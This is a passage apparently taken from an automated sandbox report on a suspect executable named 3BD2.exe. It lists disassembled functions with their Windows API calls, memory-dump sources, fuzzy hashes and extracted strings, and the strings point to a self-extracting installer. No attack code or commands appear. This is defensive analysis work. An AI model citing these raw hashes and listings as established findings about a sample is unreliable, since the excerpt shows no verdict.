                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritableUnwind___except_validate_context_record
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2164997444-1018135373
                                                                                                                                                                      • Opcode ID: 8a6259d4419b478760f7f1cd86e228faf77c918d6228047d40e05c867fd1383e
                                                                                                                                                                      • Instruction ID: 362851c4966e9ec1714a09da723f233817ef10cbe7c002a26b8f8e313b607fb6
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a6259d4419b478760f7f1cd86e228faf77c918d6228047d40e05c867fd1383e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9841E931A00208ABCB10DF69D854ADFBBA5EF45328F14816BF8146B351D7399E51CFA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDC.USER32(?), ref: 004081E0
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 004081F9
                                                                                                                                                                      • GetSystemMetrics.USER32(0000003D), ref: 00408202
                                                                                                                                                                      • GetSystemMetrics.USER32(0000003E), ref: 0040820B
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000850), ref: 00408227
                                                                                                                                                                      • DrawTextW.USER32(00000000,?,000000FF,?,?), ref: 00408240
                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00408267
                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00408274
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2466489532-0
                                                                                                                                                                      • Opcode ID: c59eb972c746f34f7a16cefcd924eff9aa34f0cbf0084bea8b4fa5726c5a922e
                                                                                                                                                                      • Instruction ID: dab6c42b18a2efa65d39de467f70c40197563c9a8a7bf0016c7f108527743f92
                                                                                                                                                                      • Opcode Fuzzy Hash: c59eb972c746f34f7a16cefcd924eff9aa34f0cbf0084bea8b4fa5726c5a922e
                                                                                                                                                                      • Instruction Fuzzy Hash: 90214171600615EFCB20DFA9DD48D4ABBE8FF08320B12856AF559D7250D770E901CF54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCPInfo.KERNEL32(005F1A48,005F1A48,?,7FFFFFFF,?,?,00422DBD,005F1A48,005F1A48,?,005F1A48,?,?,?,?,005F1A48), ref: 00422BC5
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(005F1A48,00000009,005F1A48,005F1A48,00000000,00000000,?,00422DBD,005F1A48,005F1A48,?,005F1A48,?,?,?,?), ref: 00422C48
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(005F1A48,00000001,005F1A48,005F1A48,00000000,00000000,?,00422DBD,005F1A48,005F1A48,?,005F1A48,?,?,?,?), ref: 00422CBE
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(005F1A48,00000009,00422DBD,005F1A48,00000000,00000000,?,00422DBD,005F1A48,005F1A48,?,005F1A48,?,?,?,?), ref: 00422CD5
                                                                                                                                                                        • Part of subcall function 0041E08C: RtlAllocateHeap.NTDLL(00000000,?,?,?,004199EC,?,?,00411598,00000008,?,00407D46,?,00401253,?,0040126C), ref: 0041E0BE
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(005F1A48,00000001,00422DBD,005F1A48,00000000,005F1A48,?,00422DBD,005F1A48,005F1A48,?,005F1A48,?,?,?,?), ref: 00422D39
                                                                                                                                                                      • __freea.LIBCMT ref: 00422D64
                                                                                                                                                                      • __freea.LIBCMT ref: 00422D70
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2829977744-0
                                                                                                                                                                      • Opcode ID: dd0f9891209e4dae60e1eb3a7cce694e7632c60ff0589e0b567bb49edb7bcd15
                                                                                                                                                                      • Instruction ID: 1183d272c400887cee638d6ab53bcadaf206f74bd9857aa7bc9549446da639e7
                                                                                                                                                                      • Opcode Fuzzy Hash: dd0f9891209e4dae60e1eb3a7cce694e7632c60ff0589e0b567bb49edb7bcd15
                                                                                                                                                                      • Instruction Fuzzy Hash: 5081C471F00239BEDF209E65EA41AEF7BB5EF49310F94015BE800E7241D6AD9D418BA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000001,00000020,?,?,?,?,?,?,?,004223F1,00000008,00000001,00000020,0000002C,?), ref: 00421CA7
                                                                                                                                                                      • __fassign.LIBCMT ref: 00421D26
                                                                                                                                                                      • __fassign.LIBCMT ref: 00421D45
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000001,00000001,00000020,00000005,00000000,00000000), ref: 00421D72
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,004223F1), ref: 00421D92
                                                                                                                                                                      • WriteFile.KERNEL32(?,00000008,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,004223F1), ref: 00421DCC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                      • Opcode ID: 8861e55b2deebf9ceda46804f1544e1d8c982c4a3192cbb3f11e42dbff19f942
                                                                                                                                                                      • Instruction ID: 6f6dfb112a61197fbdb2338191877b4208cf4f13c9af87cc2f04a49d4538ef9a
                                                                                                                                                                      • Opcode Fuzzy Hash: 8861e55b2deebf9ceda46804f1544e1d8c982c4a3192cbb3f11e42dbff19f942
                                                                                                                                                                      • Instruction Fuzzy Hash: 5251A470E00259EFCB10CFA8EC41AEEBBF8EF19301F55412AE955E7261D734A951CB68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004099BA
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B8), ref: 004099D7
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004099E6
                                                                                                                                                                      • wsprintfW.USER32 ref: 00409A04
                                                                                                                                                                      • GetDlgItem.USER32(?,000004B5), ref: 00409A22
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                                                                                                                                      • String ID: %d%%
                                                                                                                                                                      • API String ID: 3151147563-1518462796
                                                                                                                                                                      • Opcode ID: 3fa45e0799bae598f2e2d8a864a9c057193c1e189951e1899dba785b90c90288
                                                                                                                                                                      • Instruction ID: f831b45a37a22fdc108a7bfc71eebf2ed6f9503aec473efda8661382884f837a
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fa45e0799bae598f2e2d8a864a9c057193c1e189951e1899dba785b90c90288
                                                                                                                                                                      • Instruction Fuzzy Hash: ED31A071700704AFDB11EBA1DC86E9AB7B9FF08704F00442EFA42A62A1D779ED11CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wsprintf
                                                                                                                                                                      • String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!$pmB
                                                                                                                                                                      • API String ID: 2111968516-1545194454
                                                                                                                                                                      • Opcode ID: 9d33dae7559d74c23fd277cb4f8ddb1c556643c69bae9550fd23670df56f4f64
                                                                                                                                                                      • Instruction ID: 60c5b3630a3d17464a18ad6685be7650a209dccd31f8d24a88da0c1d00ae080f
                                                                                                                                                                      • Opcode Fuzzy Hash: 9d33dae7559d74c23fd277cb4f8ddb1c556643c69bae9550fd23670df56f4f64
                                                                                                                                                                      • Instruction Fuzzy Hash: BF21A675B00118BBCF20ABA1DC95DDE776EEF84314B10011FF911A3392CB3C9A45C699
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                                                      • Opcode ID: 8ac891841e66442e6bb3a8eea7a1bf664397751b05d4126a4f9a7c3eb770e89d
                                                                                                                                                                      • Instruction ID: 7de94457b7210b4520337a5ad058fb98b51ba7c9d1421d373705d7ac6e7c4988
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ac891841e66442e6bb3a8eea7a1bf664397751b05d4126a4f9a7c3eb770e89d
                                                                                                                                                                      • Instruction Fuzzy Hash: 332108B1F49220ABCB31DA249C40BAB7758AF417E0F150662EC06A7391D678EC41C5ED
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SystemParametersInfoW.USER32(00000029,00000000,000001F4,00000000), ref: 00409E6E
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00409E79
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00409E84
                                                                                                                                                                      • MulDiv.KERNEL32(?,00000048,00000000), ref: 00409E93
                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409EA1
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00409EC9
                                                                                                                                                                      • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00009B8A), ref: 00409EFE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3212456201-0
                                                                                                                                                                      • Opcode ID: d58813d15bbcde52b57d9eb75f986c0cf3692e14620bcbda2fc6d6ac84b21421
                                                                                                                                                                      • Instruction ID: 5ccaae8dd81ddc1720211ea1a46ef141fcb67c42bad7c984d5c153eb0fb85a5c
                                                                                                                                                                      • Opcode Fuzzy Hash: d58813d15bbcde52b57d9eb75f986c0cf3692e14620bcbda2fc6d6ac84b21421
                                                                                                                                                                      • Instruction Fuzzy Hash: 7421D575600254AFE7219B21DC49EFB7B7CEF86702F0000BAFE05A2291D7744E85CB69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004204E8: _free.LIBCMT ref: 0042050D
                                                                                                                                                                      • _free.LIBCMT ref: 0042056E
                                                                                                                                                                        • Part of subcall function 0041D99A: HeapFree.KERNEL32(00000000,00000000,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?), ref: 0041D9B0
                                                                                                                                                                        • Part of subcall function 0041D99A: GetLastError.KERNEL32(?,?,00420512,?,00000000,?,00000000,?,00420539,?,00000007,?,?,0042093D,?,?), ref: 0041D9C2
                                                                                                                                                                      • _free.LIBCMT ref: 00420579
                                                                                                                                                                      • _free.LIBCMT ref: 00420584
                                                                                                                                                                      • _free.LIBCMT ref: 004205D8
                                                                                                                                                                      • _free.LIBCMT ref: 004205E3
                                                                                                                                                                      • _free.LIBCMT ref: 004205EE
                                                                                                                                                                      • _free.LIBCMT ref: 004205F9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: bbc923de42f0ef437122df3c82742138da79d0bd250d0da0117d0a182bfc7c1a
                                                                                                                                                                      • Instruction ID: f4d3ac0eedd459e3ffb604783a3437ebfd16dc3131756eb9ea54b935a8e12a67
                                                                                                                                                                      • Opcode Fuzzy Hash: bbc923de42f0ef437122df3c82742138da79d0bd250d0da0117d0a182bfc7c1a
                                                                                                                                                                      • Instruction Fuzzy Hash: E91190B1A40B14A6DE70B7B2DC07FCB77DCAF00304F808C1EB29E66457D62CA4408664
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00408679
                                                                                                                                                                      • KillTimer.USER32(?,00000001), ref: 00408688
                                                                                                                                                                      • SetTimer.USER32(?,00000001,00000000,00000000), ref: 004086B3
                                                                                                                                                                      • SuspendThread.KERNEL32(0000037C), ref: 004086CD
                                                                                                                                                                      • ResumeThread.KERNEL32(0000037C), ref: 004086EB
                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 0040870E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DialogThreadTimer$KillResumeSuspend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4151135813-0
                                                                                                                                                                      • Opcode ID: da92ab7e72ebffc9d3d35d819006c7db242250dabfd32624ad52bf2bfa5fd689
                                                                                                                                                                      • Instruction ID: f0bd9fd6b43d81b20f4f2e44cedd7140fd228f814b95c0a8b32d14ee500d73aa
                                                                                                                                                                      • Opcode Fuzzy Hash: da92ab7e72ebffc9d3d35d819006c7db242250dabfd32624ad52bf2bfa5fd689
                                                                                                                                                                      • Instruction Fuzzy Hash: 0911A030200600EBD7355B19EF89B6B77B5BB80B05F11043EF445A26B2DBBA9881EA5C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,0041F7FC,00000000,?,?,?,00421288,?,?,00000100), ref: 004210C8
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,00421288,?,?,00000100,5EFC4D8B,?,?), ref: 00421131
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00421211
                                                                                                                                                                      • __freea.LIBCMT ref: 0042121E
                                                                                                                                                                        • Part of subcall function 0041E08C: RtlAllocateHeap.NTDLL(00000000,?,?,?,004199EC,?,?,00411598,00000008,?,00407D46,?,00401253,?,0040126C), ref: 0041E0BE
                                                                                                                                                                      • __freea.LIBCMT ref: 00421227
                                                                                                                                                                      • __freea.LIBCMT ref: 0042124C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                                      • Opcode ID: ed52da81be98cad59f77d7dec3568762f87e0dec4e3240853b208e1c15293500
                                                                                                                                                                      • Instruction ID: 69c1279e28e96eb8c91dfb1f752671f4b856179658501ecbf1cc558a6b81fe0d
                                                                                                                                                                      • Opcode Fuzzy Hash: ed52da81be98cad59f77d7dec3568762f87e0dec4e3240853b208e1c15293500
                                                                                                                                                                      • Instruction Fuzzy Hash: 4451D37270022AEFDB218F91EC41EBB36A9EFA4750F55016BFD04E7260DB39DC518668
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00418019,00417802), ref: 00418030
                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0041803E
                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00418057
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00418019,00417802), ref: 004180A9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                      • Opcode ID: a37185ad3f20b076dfe4e4f1d23dfd0e05081aac7a3ed110ae62d4f84db5e579
                                                                                                                                                                      • Instruction ID: c2dcd2ce3c2a13f6f1a8108b1778d345c136b34f4ca4d19f1fa52e66bed21051
                                                                                                                                                                      • Opcode Fuzzy Hash: a37185ad3f20b076dfe4e4f1d23dfd0e05081aac7a3ed110ae62d4f84db5e579
                                                                                                                                                                      • Instruction Fuzzy Hash: CC01F13260C716AEEA252775BCA99E72F98EB05339721133FF110801E0EF1A1CC9958C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free
                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                      • API String ID: 269201875-3972193922
                                                                                                                                                                      • Opcode ID: f744f3516f537709652fb4834a8a30cf498db5768d140dd80d4966808f968db5
                                                                                                                                                                      • Instruction ID: 76936c4c7c2ea778d0a9d44c1a9e1aee0ee1134f9a3caab825c5c92380fec68f
                                                                                                                                                                      • Opcode Fuzzy Hash: f744f3516f537709652fb4834a8a30cf498db5768d140dd80d4966808f968db5
                                                                                                                                                                      • Instruction Fuzzy Hash: ED613FBAD001199FDF14DF9AC8815EEFBF5EF58314B24416AE845E7300E635AE818B94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\3BD2.exe$x%^
                                                                                                                                                                      • API String ID: 0-858171544
                                                                                                                                                                      • Opcode ID: 7e6321788602eb2ecbe86c414d01170eefe53be325bc0caa63943943e3dcf0ac
                                                                                                                                                                      • Instruction ID: a01aea8a635f7779a3ab9261270e8ed78c6714020993bd6dc8cb3642b6e01c4d
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e6321788602eb2ecbe86c414d01170eefe53be325bc0caa63943943e3dcf0ac
                                                                                                                                                                      • Instruction Fuzzy Hash: 83414171E80214FBDB25AF99DC859EEBBF8EB89310F14406BF40497211D7794A81CB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00407E18
                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00407E35
                                                                                                                                                                      • SHGetMalloc.SHELL32(00000000), ref: 00407E5F
                                                                                                                                                                        • Part of subcall function 004098D4: GetDlgItem.USER32(?,000004B6), ref: 004098E8
                                                                                                                                                                        • Part of subcall function 004098D4: SetFocus.USER32(00000000,?,00000000,?,00407E57,?), ref: 004098EB
                                                                                                                                                                        • Part of subcall function 004098D4: GetDlgItem.USER32(?,000004B6), ref: 004098FB
                                                                                                                                                                        • Part of subcall function 004098D4: GetDlgItem.USER32(?,000004B6), ref: 00409913
